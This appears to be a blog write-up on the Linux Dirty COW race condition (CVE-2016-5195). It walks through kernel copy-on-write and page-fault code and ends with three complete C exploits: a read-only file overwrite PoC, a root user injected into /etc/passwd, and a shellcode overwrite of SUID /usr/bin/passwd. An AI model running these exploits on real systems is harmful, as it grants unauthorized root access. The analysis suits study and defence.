0x00.Before we start

CVE-2016-5195, also known as the dirtyCow, is a famous race-condition bug in Linux Kernel. It allows hackers to make an privileged overwrite on files that can only be read by them.

Before we start, let’s take a look at some antecedent knowledge.

1. Copy-on-Write

Before learning about what is dirtyCow, we need to know “what is a COW“ firstly. Let’s just start from some legacy knowledge.

basic COW

COW, also the Copy On Write , is a mechanism to reduce the cost of system resources. A complete copy of a process’s whole content of its address space won’t be allocated to its new child process while the process trying to make a new child process by the fork() syscall, but a less expensive way is chosen:

The parent process and the child process will share the same page frames instead of allocating new page frames to the child and make a copy.
The allocation will happen only when one of them is trying to write new data on it, then comes the time of copying.
All page frames will be read only right after the fork(), so the kernel can make the detection of writing by the page fault and start the COW.

mmap & /proc/self/mem & COW

Similarily, COW also happen in the process of making a write on /proc/self/mem which representing the whole virtual memory address space of current process in Linux. If we make a mmap() of a read-only file and try to overwrite it across the /proc/self/mem, the COW will also happen and a copy of corresponding content of the fill will be make, thus the original file will not be affected.

2. page fault

The Memory Management Unit (aka MMU) is used to translate virtual address to physical address. But it’s possible that there’s no a valid PTE(page table entry) for a memory access on a specific address currently, which means that the process tried to access a page without proper preparations. So a hardware interrupt called page fault will be raised.

Though it’s name is “fault”, but it may not really mean that a trouble occurs, it just indicates that “something is wrong”.

Page fault may happen while:

When we’re trying to access a page that’s not in the physical memory.
When we’re trying to access a page that we don’t have permission to do so.

To subdivide, there’re three kinds of page fault:

When we’re accessing a valid address:
- There’s no corresponding page frame in the memory. Then the corresponding content will be read from the disk to the memory, and the MMU will make the mapping. This is hard page fault.
- The page is already in the memory, but the mapping hadn’t been established. Then the mapping will be made(e.g. shared memory). This is soft page fault.
When we’re accessing an invalid address:
- The page is not in the process’s address space. Then the process will be killed by SIGSEGV. This is invalid page fault.

Handle the page fault in Linux kernel

Now we’re going to analyze the code of page fault handler in Linux kernel v4.4, which has the dirtyCOW in it : )

We mainly focus on the situation of using /proc/self/mem to write on the read-only file’s mapping memory, which causes the copy-on-write and the vulnerability.

By the way, we can read the source code of Linux kernel online on https://elixir.bootlin.com/.

For general page fault handling, no matter the entry is __do_page_faulr() or faultin_page(), they’ll all call the handle_mm_fault() and the control flow is as below:

handle_mm_fault()	// allocate the PTE
	__handle_mm_fault()
		handle_pte_fault()
			// there're two branch we main focus
			do_wp_fault()
			do_fault()
				// there're three branches there and only one will be done
				do_read_fault()
				do_cow_fault()  // we mainly focus on it
			    do_share_fault()

① handle_pte_fault(): handle page fault according to the PTE

The function is defined in mm/memory.c , which is used to handle the page fault according to the PTE.

/*
 * These routines also need to handle stuff like marking pages dirty
 * and/or accessed for architectures that don't do it in hardware (most
 * RISC architectures).  The early dirtying is also good on the i386.
 *
 * There is also a hook called "update_mmu_cache()" that architectures
 * with external mmu caches can use to update those (ie the Sparc or
 * PowerPC hashed page tables that act as extended TLBs).
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), and pte mapped but not yet locked.
 * We return with pte unmapped and unlocked.
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)

FIrstly it’ll check whether the page is present(e.g. for x86, the PTE has a PTE_P bit that indicates whether the page is present), if so, it means that we may need to allocate a new page frame or swap the old page back:

{
	//...
	entry = *pte;
	barrier();
	if (!pte_present(entry)) {// page is not present
		if (pte_none(entry)) {// pte is NULL, this's the first time of access
			if (vma_is_anonymous(vma))//for anonymous vma, a zero-page will be allocated
				return do_anonymous_page(mm, vma, address,
							 pte, pmd, flags);
			else
				// non-anonymous vma
				// just allocate the page and write corresponding content later
				return do_fault(mm, vma, address, pte, pmd,
						flags, entry);
		}
		// the page is swapped to external storage, just swap it back is okay
		return do_swap_page(mm, vma, address,
					pte, pmd, flags, entry);
	}
	//...

If the page is already in the main memory, check whether the _PAGE_PROTNONE is set. if so, then it comes to the do_numa_page() path.

If not, then it’ll check whether the FAULT_FLAG_WRITE is set. If so, it’ll check whether we have the permission to write. If not, then it comes to the time of COW!

//...

if (pte_protnone(entry)) // the _PAGE_PROTNONE is set
	return do_numa_page(mm, vma, address, entry, pte, pmd);

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
	goto unlock;
if (flags & FAULT_FLAG_WRITE) {// FAULT_FLAG_WRITE means that it's a writing access
	if (!pte_write(entry)) // no permission to write this page frame
		// COW! allocate new page and write by do_fault()->do_cow_fault()
		return do_wp_page(mm, vma, address,
				pte, pmd, ptl, entry);
	entry = pte_mkdirty(entry);
}

// ...

② do_fault(): call specific function according to the kind of fault

This function is also in mm/memory.c , it’ll call specific function according to the kind of fault.

/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		unsigned int flags, pte_t orig_pte)
{
	pgoff_t pgoff = (((address & PAGE_MASK)
			- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

	pte_unmap(page_table);
	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
	if (!vma->vm_ops->fault)
		return VM_FAULT_SIGBUS;
	if (!(flags & FAULT_FLAG_WRITE))// not a writing access(only to read)
		return do_read_fault(mm, vma, address, pmd, pgoff, flags,
				orig_pte);
	if (!(vma->vm_flags & VM_SHARED))// not accessing shared memory(private file mapping)
		return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
				orig_pte); // copy-on-write
	// fault for accessing shared memory
	return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}

③ do_cow_fault(): make the basic paging

The function is also located in mm/memory.c . It’ll allocate the page and called the __do_fault() to deal with the fault, which moves corresponding data to the page. Then the PTE of the page fault address in the page table will be set to the new page.

static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd,
		pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
	//...

	// allocate a new page for the page fault address
	new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
	if (!new_page)
		return VM_FAULT_OOM;

	//...

	// the vma->vm_ops.fault() will be called
	// for file-related operation(e.g. writing to a mapping page of a file),
	// it'll copy the data of the file to the page
	// (e.g. for ext4, ext4_file_fault() will be called to do it)
	ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;

	// some checks...

	// mapping the new page to the page fault address
	do_set_pte(vma, address, new_page, pte, true, true);
	
	//...

The core of __do_fault() is just to call the specific function of a vm_area’s operation table.

/*
 * The mmap_sem must have been held on entry, and may have been
 * released depending on flags and vma->vm_ops->fault() return value.
 * See filemap_fault() and __lock_page_retry().
 */
static int __do_fault(struct vm_area_struct *vma, unsigned long address,
			pgoff_t pgoff, unsigned int flags,
			struct page *cow_page, struct page **page)
{
	struct vm_fault vmf;
	int ret;

	//...

	ret = vma->vm_ops->fault(vma, &vmf);
	
	//...

The do_cow_fault() does make the basic paging, but the operation of writing new data hadn’t been done yet. So let’s come to the final step now.

④ do_wp_page(): make the copy-on-write

When the page is in the memory but we don’t have the permission to write on it, the do_wp_page() will do the copy-on-write to make a copy of the original page, and out writing will only affect this individual new page frame.

/*
 * This routine handles present pages, when users try to write
 * to a shared page. It is done by copying the page to a new address
 * and decrementing the shared-page counter for the old page.
 *
 * Note that this routine assumes that the protection checks have been
 * done by the caller (the low-level page fault routine in most cases).
 * Thus we can safely just mark it writable once we've done any necessary
 * COW.
 *
 * We also mark the page dirty at this point even though the page will
 * change only once the write actually happens. This avoids a few races,
 * and potentially makes it more efficient.
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), with pte both mapped and locked.
 * We return with mmap_sem still held, but pte unmapped and unlocked.
 */
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		spinlock_t *ptl, pte_t orig_pte)
	__releases(ptl)
{

Firstly it’ll check whether it’s a special mapping page. If so, it’ll check whether the vm_area has the VM_WRITE|VM_SHARED flags, which means that it’s a shared and writable memory region and we only need to make the page writable. If not, then the wp_page_copy() will be called to do the COW.

struct page *old_page;

// get the `page` struct of the linear address that caused page fault
// for some special mapping, the kernel doesn't want them to appear in mm management,
// so they won't have their own `page` struct
// (e.g. KSM pages)
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) {// it's a special mapping page
	/*
	 * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
	 * VM_PFNMAP VMA.
	 *
	 * We should not cow pages in a shared writeable mapping.
	 * Just mark the pages writable and/or call ops->pfn_mkwrite.
	 */
	if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
			     (VM_WRITE|VM_SHARED))
		return wp_pfn_shared(mm, vma, address, page_table, ptl,
				     orig_pte, pmd);

	pte_unmap_unlock(page_table, ptl);
	return wp_page_copy(mm, vma, address, page_table, pmd,
			    orig_pte, old_page);
}

For normal page, if it’s an anonymous page(not related to a file, e.g. stack and heap), then check for the mapping times, if it’s 1, just mark the page writable is okay.

/*
 * Take out anonymous pages first, anonymous shared vmas are
 * not dirty accountable.
 */
if (PageAnon(old_page) && !PageKsm(old_page)) {//it's an anonymous page && not ksm
	if (!trylock_page(old_page)) {
		page_cache_get(old_page);
		pte_unmap_unlock(page_table, ptl);
		lock_page(old_page);
		page_table = pte_offset_map_lock(mm, pmd, address,
						 &ptl);
		if (!pte_same(*page_table, orig_pte)) {
			unlock_page(old_page);
			pte_unmap_unlock(page_table, ptl);
			page_cache_release(old_page);
			return 0;
		}
		page_cache_release(old_page);
	}
	// check wthere there's only one process is using the page (by reuse_swap_page())
	// if so, just reuse the page is okay
	if (reuse_swap_page(old_page)) {
		/*
		 * The page is all ours.  Move it to our anon_vma so
		 * the rmap code will not search our parent or siblings.
		 * Protected against the rmap code by the page lock.
		 */
		page_move_anon_rmap(old_page, vma, address);
		unlock_page(old_page);
		// just mark the page writable
		return wp_page_reuse(mm, vma, address, page_table, ptl,
				     orig_pte, old_page, 0, 0);
	}
	unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
				(VM_WRITE|VM_SHARED))) {
	return wp_page_shared(mm, vma, address, page_table, pmd,
			      ptl, orig_pte, old_page);
}

After all conditions above are eliminated, it comes the time to do the copy-on-write. We allocate a new page there and copy the content from the old page across wp_page_copy().

	/*
	 * Ok, we need to copy. Oh, well..
	 */
	page_cache_get(old_page);

	pte_unmap_unlock(page_table, ptl);
	// copy the page now
	return wp_page_copy(mm, vma, address, page_table, pmd,
			    orig_pte, old_page);
}

3. COW while writing to /proc/self/mem

So when we use mmap() to map a read-only file, and use the /proc/self/mem to write directly on the mmap area, the control flow is as below:

SYSCALL: writeのflow

Syscall write() will called the sys_write() in kernel, which defined in fs/read_write.c :

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos = file_pos_read(f.file);
		ret = vfs_write(f.file, buf, count, &pos);
		if (ret >= 0)
			file_pos_write(f.file, pos);
		fdput_pos(f);
	}

	return ret;
}

This function will finally call the specific write() function of the file struct’s file_operations table.

entry_SYSCALL_64()
	sys_write()
		vfs_write()
			__vfs_write()
				file->f_op->write()

For /proc/self/mem, it will be the mem_write(), and the core of this function is mem_rw() in fact, which defined in fs/proc/base.c . It’ll allocate a temporary page to copy the data, and do the real operation by access_remote_vm().

static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
	struct mm_struct *mm = file->private_data;
	unsigned long addr = *ppos;
	ssize_t copied;
	char *page;

	if (!mm)
		return 0;

	// allocate temp page
	page = (char *)__get_free_page(GFP_TEMPORARY);
	if (!page)
		return -ENOMEM;

	copied = 0;
	if (!atomic_inc_not_zero(&mm->mm_users))
		goto free;

	while (count > 0) {
		int this_len = min_t(int, count, PAGE_SIZE);

        // copy the data from userspace to the temp page firstly
		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		// core: access_remote_vm()
		this_len = access_remote_vm(mm, addr, page, this_len, write);
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		// if the operation is read, temp page has the data we need now, just copy back
		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len;
		addr += this_len;
		copied += this_len;
		count -= this_len;
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}

mem_rw() is a function that consists of operation of both reading and writing. The core of read/write operation is in access_remote_vm() , and it’ll call __access_remote_vm() defined in mm/memory.c :

/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, int write)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */

It’s core is using a loop to copy the data page by page. Firstly it’ll try to get the destination page’s page struct by get_user_pages(). If it failed to get the page, it’ll find out the vma that the target address belongs and call the vma->vm_ops->access() to hande it.

	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		ret = get_user_pages(tsk, mm, addr, 1,
				write, 1, &page, &vma);
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif

If it successfully gets the page struct, it’ll use kmap() to map the page to a writable virtual address space temporarily in highmem area so that we can read/write the page frame by it’s virtual address that we just mapped. Then it comes to the real read/write time.

		} else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			// map the page to highmem by kmap()
			maddr = kmap(page);
			if (write) {
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes); // write to page
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes); // read from page
			}
			kunmap(page);	// unmap the page
			page_cache_release(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}

So let’s look at how it get the page by get_user_pages() now. It’ll finally call the __get_user_pages_locked() and the __get_user_pages() will be called, which defined in mm/gup.c. It mainly use a big loop to handle everything:

long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *nonblocking)
{
	long i = 0;
	unsigned int page_mask;
	struct vm_area_struct *vma = NULL;

	if (!nr_pages)
		return 0;

	VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

	/*
	 * If FOLL_FORCE is set then do not force a full fault as the hinting
	 * fault information is unrelated to the reference behaviour of a task
	 * using the address space
	 */
	if (!(gup_flags & FOLL_FORCE))
		gup_flags |= FOLL_NUMA;

	do {
		struct page *page;
		unsigned int foll_flags = gup_flags;
		unsigned int page_increm;

We mainly focus on the core in this loop. It’ll firstly use the follow_page_mask() to get thepage struct of target virtual address. If it failed, it means that we cannot access the page frame right now. There’re two reasons for this:

There’s no a physical page frame for this virtual address.
We don’t have the permission to access the page now.(e.g. we’re trying to write an unwritable page)

For this condition, which presents a “page fault”, the program will call the faultin_page() to handle this.

		//...
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current)))
			return i ? i : -ERESTARTSYS;
		cond_resched();
		//get the `page` struct of virtual address' physical page frame
		page = follow_page_mask(vma, start, foll_flags, &page_mask);
		if (!page) {// "page fault"
			int ret;
			ret = faultin_page(tsk, vma, start, &foll_flags,
					nonblocking);
			switch (ret) {
			case 0:
				goto retry;//successfully to handle page fault, retry our operation
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		}

		//...

For copy-on-write, it’ll be like this:

When we tried to access a page firstly, there’s no physical page frame for it (lazy kernel will only create the vm_area_struct at the beginning, the page will be allocated only when it’s accessed), so the follow_page_mask() returns a NULL, representing a page fault. Then the program will use faultin_page() to handle it and the physical page frame will be allocated.
Then it’ll be back to the tag retry and recall the follow_page_mask() . If we’re trying to write on an unwritable page, the follow_page_mask() will return a NULL again, representing a page fault. Then the program will use faultin_page() to do the copy-on-write.

/proc/self/mem represents the whole memory of a process, and it’s always writable for the process. So it won’t make the SIGSEGV while writing on a read-only mapped page, but the copy-on-write will be done.

So the whole chain is as below:

mem_rw()
	__get_free_page()
	access_remote_vm()
		__access_remote_vm()
			get_user_pages()
				__get_user_pages_locked()
					__get_user_pages()
						follow_page_mask()
						faultin_page()

Then let’s have a look at the faultin_page() .

First time of page fault

When we tried to access a page firstly, there’s no physical page frame for it (lazy kernel will only create the vm_area_struct at the beginning, the page will be allocated only when it’s accessed), so the follow_page_mask() returns a NULL, representing a page fault. Then the program will use faultin_page() to handle it, which defined in mm/gup.c :

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	//...

	ret = handle_mm_fault(mm, vma, address, fault_flags);

	//...

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags &= ~FOLL_WRITE;
	return 0;
}

It finally call the handle_mm_fault() to handle the page fault as below:

faultin_page()
    handle_mm_fault()
        __handle_mm_fault()
            handle_pte_fault()//pte is NULL, first time of access
                do_fault()//non-anonymous page, just take it in
                    do_cow_fault()//we're going to write the page
                    	do_set_pte()
                            maybe_mkwrite()
                                pte_mkdirty()//mark it dirty

Notice that at the final stage it’ll check for VM_FAULT_WRITE flag and clear the FOLL_WRITE bit in the caller’s flag filed. For allocating a writable page, the flag bit will be clear. But for a read-only page’s allocation, this stage will be ignored.

Second time of page fault

Though we’d like to write on a read-only mapped page across the /proc/self/mem, the page fault handler do it in the traditional way, so the page is read-only for us yet, and the follow_page_mask() will return NULL again, representing a page fault.

So we will enter the faultin_page() again and do the copy-on-write. This time the kernel will allocate a new page for us to write, and the FOLL_WRITE bit of variable foll_flags in __get_user_pages() will be cleared in faultin_page() ‘s final stage.

The call chain is as below:

faultin_page()
    handle_mm_fault()
        __handle_mm_fault()
            handle_pte_fault()
                do_wp_page()
                	reuse_swap_page(old_page)
                		wp_page_reuse()

After twice page fault, we’re back to the tag retry in __get_user_pages() and try to get the page for the third time. Now the FOLL_WRITE bit is cleared, which means that the kernel will treat it as a writable page for us. So the follow_page_mask() will get the page successfully finally.

0x01. Analysis of the vulnerability

Now let’s have a review of the whole process of writing to a read-only mapped file by the /proc/self/mem.

race condition under multi-thread environment

We can notice that the follow_page_mask() check for whether the page will be written by the FOLL_WRITE bit of foll_flags , but the operation of writing is decided by the write param passed to mem_rw() . So there’s a subtle race condition there. Now let’s start two threads to make it:

Thread[1]: Write the data to read-only mmapped file across the /proc/self/mem repeatedly. It’ll cause the copy-on-write.
Thread[2]: Use madvise() syscall to tell the kernel to mark the memory area of read-only mmapped file unused repeatedly. Then the page frame of this area will be released and the PTE will be cleared.

Then it comes to the interesting part:

Four times of getting pages & Three times of page fault

We can easily notice that there’s a race condition like this:

Thread[1] finished twice page fault, prepared to get the page for the third time.
Thread[2] used the madvise() syscall to clear the page.
Thread[1] failed to get the page for the third time, “page fault” again.

Now the page mapped to the file will be back again just like how the first time of page fault was handled. So the program will try to get the page for the fourth time. Notice that the FOLL_WRITE bit is cleared, the kernel will think that “we’re going to read this page”. So we can get the page “normally”.

But backing to the mem_rw(), we’re trying to write the page in fact. So the file mapping page will be written directly. Then we have completed a privileged overwrite on a read-only file.

0x02. Exploit

So we know that how dirtyCOW works now: just use two threads to make a race condition.

Thread[1]: Write the data to read-only mmapped file across the /proc/self/mem repeatedly.
Thread[2]: Use madvise() syscall to tell the kernel to mark the memory area of read-only mmapped file unused repeatedly.

poc

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * poc by arttnba3
 * 2021.4.14
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

struct stat dst_st, fk_st;
void * map;
char *fake_content;

void * madviseThread(void * argv);
void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    if (argc < 3)
    {
        puts("usage: ./poc destination_file fake_file");
        return 0;
    }

    pthread_t write_thread, madvise_thread;

    int dst_fd, fk_fd;
    dst_fd = open(argv[1], O_RDONLY);
    fk_fd = open(argv[2], O_RDONLY);
    printf("fd of dst: %d\nfd of fk: %d\n", dst_fd, fk_fd);

    fstat(dst_fd, &dst_st); // get destination file length
    fstat(fk_fd, &fk_st); // get fake file length
    map = mmap(NULL, dst_st.st_size, PROT_READ, MAP_PRIVATE, dst_fd, 0);

    fake_content = malloc(fk_st.st_size);
    read(fk_fd, fake_content, fk_st.st_size);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x100000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, fake_content, fk_st.st_size);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x100000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

We can see that we successfully overwrite a read-only file with our poc.

Privilege Escalating

一、add a new root-privileged user

We can modified the /etc/passwd and add a new user with root privilege. And the root comes with our login.

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * exploit by arttnba3
 * 2021.5.24
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <crypt.h>

struct stat passwd_st;
void * map;
char *fake_user;
int fake_user_length;

pthread_t write_thread, madvise_thread;

struct Userinfo
{
    char *username;
    char *hash;
    int user_id;
    int group_id;
    char *info;
    char *home_dir;
    char *shell;
}hacker = 
{
    .user_id = 0,
    .group_id = 0,
    .info = "a3pwn",
    .home_dir = "/root",
    .shell = "/bin/bash",
};

void * madviseThread(void * argv);
void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    int passwd_fd;

    if (argc < 3)
    {
        puts("usage: ./dirty username password");
        puts("do not forget to make a backup for the /etc/passwd by yourself");
        return 0;
    }

    hacker.username = argv[1];
    hacker.hash = crypt(argv[2], argv[1]);

    fake_user_length = snprintf(NULL, 0, "%s:%s:%d:%d:%s:%s:%s\n", 
        hacker.username, 
        hacker.hash, 
        hacker.user_id, 
        hacker.group_id, 
        hacker.info, 
        hacker.home_dir, 
        hacker.shell);
    fake_user = (char * ) malloc(fake_user_length + 0x10);

    sprintf(fake_user, "%s:%s:%d:%d:%s:%s:%s\n", 
        hacker.username, 
        hacker.hash, 
        hacker.user_id, 
        hacker.group_id, 
        hacker.info, 
        hacker.home_dir, 
        hacker.shell);

    
    passwd_fd = open("/etc/passwd", O_RDONLY);
    printf("fd of /etc/passwd: %d\n", passwd_fd);

    fstat(passwd_fd, &passwd_st); // get /etc/passwd file length
    map = mmap(NULL, passwd_st.st_size, PROT_READ, MAP_PRIVATE, passwd_fd, 0);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x10000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, fake_user, fake_user_length);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x10000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

Don’t forget to compile with param -lcrypt .

1	gcc dirty.c -o dirty -static -lpthread -lcrypt

Run it, and we can get the root.

二、privileged by SUID

We can also overwrite some SUID programs(which will be run with the uid set in advance) to malicious code to archive the privilege escalating. I choose to overwrite /usr/bin/passwdthere.

I used the msfvenom to construct the payload as below:
1
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

/**
 * 
 * CVE-2016-5195
 * dirty C-O-W
 * poc by arttnba3
 * 2021.4.14
 *  
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

struct stat dst_st, fk_st;
void * map;
char *fake_content;

unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
  0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
  0x6a, 0x3b, 0x58, 0x0f, 0x05
};
unsigned int sc_len = 149;

void * madviseThread(void * argv);
void * writeThread(void * argv);

int main(int argc, char ** argv)
{
    pthread_t write_thread, madvise_thread;

    int dst_fd, fk_fd;
    dst_fd = open("/usr/bin/passwd", O_RDONLY);
    printf("fd of dst: %d\n", dst_fd);

    fstat(dst_fd, &dst_st); // get destination file length
    map = mmap(NULL, dst_st.st_size, PROT_READ, MAP_PRIVATE, dst_fd, 0);

    pthread_create(&madvise_thread, NULL, madviseThread, NULL);
    pthread_create(&write_thread, NULL, writeThread, NULL);

    pthread_join(madvise_thread, NULL);
    pthread_join(write_thread, NULL);

    return 0;
}

void * writeThread(void * argv)
{
    int mm_fd = open("/proc/self/mem", O_RDWR);
    printf("fd of mem: %d\n", mm_fd);
    for (int i = 0; i < 0x10000; i++)
    {
        lseek(mm_fd, (off_t) map, SEEK_SET);
        write(mm_fd, sc, sc_len);
    }

    return NULL;
}

void * madviseThread(void * argv)
{
    for (int i = 0; i < 0x10000; i++){
        madvise(map, 0x100, MADV_DONTNEED);
    }

    return NULL;
}

Run it, and we can get the root.